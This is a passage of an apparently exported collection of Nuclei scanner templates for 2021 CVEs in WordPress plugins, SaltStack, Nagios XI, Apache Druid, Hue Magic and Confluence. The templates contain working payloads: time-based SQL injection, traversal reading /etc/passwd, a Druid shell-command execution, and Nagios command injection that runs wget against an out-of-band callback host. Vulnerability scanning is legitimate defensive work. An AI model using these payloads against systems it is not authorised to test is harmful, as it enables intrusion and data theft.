An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6c25a5f0-a137-4ea5-9422-8ae393d7b76b\n - https://wordpress.org/plugins/paid-memberships-pro/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25114\n - https://www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-25114\n cwe-id: CWE-89\n epss-score: 0.0412\n epss-percentile: 0.91962\n cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: strangerstudios\n product: paid_memberships_pro\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/paid-memberships-pro\"\n tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - duration_1>=6\n - contains(header_1, \"application/json\")\n - status_code == 200\n - contains(body_2, 'other_discount_code_')\n condition: and\n# digest: 490a0046304402205779f4688b602f810729763c28227697e17fbe54eabdf2769e00c3efd62634dc0220099aece2ea83884ee11dd109d206c253835129f29b3ea2922f55c13bbcce1686:922c64590222798bb761d5b6d8e72950", "hash": "d352f64e2655c763d414c5c1a46971f8", 
"level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f9" }, "name": "CVE-2021-25118.yaml", "content": "id: CVE-2021-25118\n\ninfo:\n name: Yoast SEO 16.7-17.2 - Information Disclosure\n author: DhiyaneshDK\n severity: medium\n description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: Fixed in version 17.3.\n reference:\n - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550\n - https://plugins.trac.wordpress.org/changeset/2608691\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25118\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-25118\n cwe-id: CWE-200\n epss-score: 0.00173\n epss-percentile: 0.5348\n cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: yoast\n product: yoast_seo\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/posts?per_page=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n regex:\n - '\"path\":\"(.*)/wp-content\\\\(.*)\",\"size'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '\"path\":\"(.*)/wp-content\\\\(.*)\",\"size'\n part: body\n# digest: 
4a0a00473045022100ba7a661218a1675b4be3d3970f6130b049f1a01cdf39b787b6305b14f5d7890302206dac7b754b0ebb88e2061818cbef0180bf4b74b44844829f6821143b16255802:922c64590222798bb761d5b6d8e72950", "hash": "55ec77675e03a1df0628363677fc0333", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fa" }, "name": "CVE-2021-25120.yaml", "content": "id: CVE-2021-25120\n\ninfo:\n name: Easy Social Feed < 6.2.7 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.\n remediation: |\n Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0\n - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25120\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25120\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:*\n metadata:\n max-request: 2\n vendor: easysocialfeed\n product: easy_social_feed\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'type' : ''\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950", "hash": "bb3588d77de2a65fb4e7985613ab416a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fb" }, "name": "CVE-2021-25281.yaml", "content": "id: CVE-2021-25281\n\ninfo:\n name: SaltStack Salt <3002.5 - Auth Bypass\n author: madrobot\n severity: critical\n description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.\n remediation: |\n Upgrade to SaltStack Salt version 3002.5 or later to mitigate this vulnerability.\n reference:\n - http://hackdig.com/02/hack-283902.htm\n - https://dozer.nz/posts/saltapi-vulns\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25281\n - https://github.com/saltstack/salt/releases\n - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-25281\n cwe-id: CWE-287\n epss-score: 0.87406\n epss-percentile: 0.98556\n cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: saltstack\n product: \"salt\"\n tags: cve,cve2021,saltapi,rce,saltstack,unauth\n\nhttp:\n - raw:\n - |\n POST /run HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"return\"\n - \"tag\"\n - 
\"jid\"\n - \"salt\"\n - \"wheel\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022024b1fa47aa40900fc6d2780d4b058e73c105e0afea27957c4b13eaa9d832e518022100b564558f8322ff1be933b2018a3a2ec91219e0e1399b633b02e3d65ea0349af4:922c64590222798bb761d5b6d8e72950", "hash": "d44042252df9c6e12c7854f3520ce01e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fc" }, "name": "CVE-2021-25296.yaml", "content": "id: CVE-2021-25296\n\ninfo:\n name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: |\n Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://github.com/rapid7/metasploit-framework/pull/17494\n - http://nagios.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25296\n - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25296\n cwe-id: CWE-78\n epss-score: 0.89514\n epss-percentile: 0.98511\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: 
nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n - |\n GET /nagiosxi/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 20s\n GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body_4\n words:\n - \"Event Log\"\n - \"Display Name\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - \"name=['\\\"]nsp['\\\"] value=['\\\"](.*)['\\\"]>\"\n internal: true\n part: body\n\n - type: regex\n name: nsp_auth\n group: 1\n regex:\n - \"var nsp_str = ['\\\"](.*)['\\\"];\"\n internal: true\n part: body\n# digest: 490a0046304402206666d4036d4d35dab96e894b38ad9c5edf03bd115f6e5d9e2b93663420df328c0220408cb9f27506a076cc138fa9720eb3f0fc641f9eb0b01d3742742c5bc0c07c90:922c64590222798bb761d5b6d8e72950", "hash": "0d6cff145d41f96c565dd65e4279f8d1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fd" }, "name": "CVE-2021-25297.yaml", "content": "id: CVE-2021-25297\n\ninfo:\n name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: |\n Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. 
There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://github.com/rapid7/metasploit-framework/pull/17494\n - http://nagios.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25297\n - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25297\n cwe-id: CWE-78\n epss-score: 0.90211\n epss-percentile: 0.98732\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n - |\n GET /nagiosxi/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 20s\n GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body_4\n words:\n - \"Ping\"\n - \"Switch Details\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - \"name=['\\\"]nsp['\\\"] value=['\\\"](.*)['\\\"]>\"\n internal: true\n part: body\n\n - type: regex\n name: nsp_auth\n group: 1\n regex:\n - \"var nsp_str = ['\\\"](.*)['\\\"];\"\n internal: true\n part: body\n# digest: 4a0a00473045022002c535c416c93bf3230b4b497297c11d4d1ee31297754e601903ba6730dfdae1022100a8503c90b036840ad6480ea87590c5fde3b4b3d809100390be430825d84803e6:922c64590222798bb761d5b6d8e72950", "hash": "8adca23915f67a00a39619ded4cc5e86", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fe" }, "name": "CVE-2021-25298.yaml", "content": "id: CVE-2021-25298\n\ninfo:\n name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: |\n Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. 
This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://github.com/rapid7/metasploit-framework/pull/17494\n - http://nagios.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25298\n - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25298\n cwe-id: CWE-78\n epss-score: 0.97349\n epss-percentile: 0.9988\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n - |\n GET /nagiosxi/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 20s\n GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body_4\n words:\n - \"Connection 
Information\"\n - \"Host Check\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - \"name=['\\\"]nsp['\\\"] value=['\\\"](.*)['\\\"]>\"\n internal: true\n part: body\n\n - type: regex\n name: nsp_auth\n group: 1\n regex:\n - \"var nsp_str = ['\\\"](.*)['\\\"];\"\n internal: true\n part: body\n# digest: 4a0a0047304502207ffbd21c262951d6e67fbd7d2e110f6b43874fabb78cfbc0af65808cacffb342022100d72430ef1b99310c8ea24fa8e2fc77ed72875051b2f4d657e42cd2c2244c5630:922c64590222798bb761d5b6d8e72950", "hash": "0a2624fe718894db0126ee14ed6512d3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ff" }, "name": "CVE-2021-25299.yaml", "content": "id: CVE-2021-25299\n\ninfo:\n name: Nagios XI 5.7.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Nagios XI 5.7.5 contains a cross-site scripting vulnerability in the file /usr/local/nagiosxi/html/admin/sshterm.php, due to improper sanitization of user-controlled input. 
A maliciously crafted URL, when clicked by an admin user, can be used to steal session cookies, or it can be chained with the previous bugs to get one-click remote command execution on the Nagios XI server.\n remediation: |\n Upgrade Nagios XI to the latest version or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md#cve-2021-25299\n - http://nagios.com\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25299\n - https://assets.nagios.com/downloads/nagiosxi/versions.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25299\n cwe-id: CWE-79\n epss-score: 0.96845\n epss-percentile: 0.99634\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve2021,cve,nagios,nagiosxi,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n - |\n GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(header_3, 'text/html')\"\n - \"status_code_3 == 200\"\n - 'contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")'\n condition: and\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - 'name=\"nsp\" value=\"(.*)\">'\n internal: true\n part: body\n# digest: 
4b0a00483046022100d689aec24e353a8512a7a711f112d6a15becf87f58a454eef3116dbbe9f8d432022100c4b79ea5049b4b480e421cafdc165fe61ba55a10946eb5d9f61ce59d1ef8f5ad:922c64590222798bb761d5b6d8e72950", "hash": "838e6cc4d9e2331694fc5b08d3ba9799", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308300" }, "name": "CVE-2021-25646.yaml", "content": "id: CVE-2021-25646\n\ninfo:\n name: Apache Druid - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Apache Druid.\n reference:\n - https://paper.seebug.org/1476/\n - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E\n - http://www.openwall.com/lists/oss-security/2021/01/29/6\n - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25864\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25646\n cwe-id: CWE-732\n epss-score: 0.97323\n epss-percentile: 0.99871\n cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: druid\n tags: cve2021,cve,apache,rce,druid\n\nhttp:\n - raw:\n - |\n POST /druid/indexer/v1/sampler HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"type\":\"index\",\n \"spec\":{\n \"ioConfig\":{\n \"type\":\"index\",\n \"firehose\":{\n \"type\":\"local\",\n \"baseDir\":\"/etc\",\n 
\"filter\":\"passwd\"\n }\n },\n \"dataSchema\":{\n \"dataSource\":\"odgjxrrrePz\",\n \"parser\":{\n \"parseSpec\":{\n \"format\":\"javascript\",\n \"timestampSpec\":{\n\n },\n \"dimensionsSpec\":{\n\n },\n \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n \"\":{\n \"enabled\":\"true\"\n }\n }\n }\n }\n },\n \"samplerConfig\":{\n \"numRows\":10\n }\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"numRowsRead\"\n - \"numRowsIndexed\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200fb9d98df795d9808e6862bf4bd9bcb07827c6485050f18ef70a560a6f72c59202206fcce136e7f27d758cba9d444d64704b998c3469b1ee42efdd81942157b76359:922c64590222798bb761d5b6d8e72950", "hash": "c2eed2bb1cc5cc45daf7563e327b96ec", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308301" }, "name": "CVE-2021-25864.yaml", "content": "id: CVE-2021-25864\n\ninfo:\n name: Hue Magic 3.0.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: |\n Apply the latest security patch or update to a non-vulnerable version of Hue Magic.\n reference:\n - https://github.com/Foddy/node-red-contrib-huemagic/issues/217\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25864\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-25864\n cwe-id: CWE-22\n epss-score: 0.29108\n epss-percentile: 0.96769\n cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: dgtl\n product: huemagic\n framework: node.js\n shodan-query: title:\"NODE-RED\"\n tags: cve2021,cve,huemagic,lfi,dgtl,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220232dad6106246e48af27d4140906ad837429c3773f1b6f07ea2a498658394780022100a679963118929eb91997fffc431f95c3fad89464666e87470d287e74825577a7:922c64590222798bb761d5b6d8e72950", "hash": "bcb347565108aee275d760e5789102a0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308302" }, "name": "CVE-2021-25899.yaml", "content": "id: CVE-2021-25899\n\ninfo:\n name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection\n author: edoardottt\n severity: high\n description: |\n Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. 
An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.\n reference:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25899\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-25899\n cwe-id: CWE-89\n epss-score: 0.50721\n epss-percentile: 0.9747\n cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: void\n product: aurall_rec_monitor\n shodan-query: html:\"AURALL\"\n tags: cve2021,cve,sqli,void,aurall\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy¶m2=test\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Contacte con el administrador\")'\n condition: and\n# digest: 4a0a004730450220032725c31303f01d831554ead8dfbb845e5e5324a12f8fa5b6a83b473c5e565002210094b392e00a4f07522830b49db305a4c03bd5d331a4b9fb5384ab046552e98b77:922c64590222798bb761d5b6d8e72950", "hash": 
"49449131a51aad489848245a8b2a6a8b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308303" }, "name": "CVE-2021-26084.yaml", "content": "id: CVE-2021-26084\n\ninfo:\n name: Confluence Server - Remote Code Execution\n author: dhiyaneshDk,philippedelteil\n severity: critical\n description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://jira.atlassian.com/browse/CONFSERVER-67940\n - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26084\n - https://github.com/Udyz/CVE-2021-26084\n - https://github.com/0xsyr0/OSCP\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-26084\n cwe-id: CWE-917\n epss-score: 0.97414\n epss-percentile: 0.99924\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 13\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: 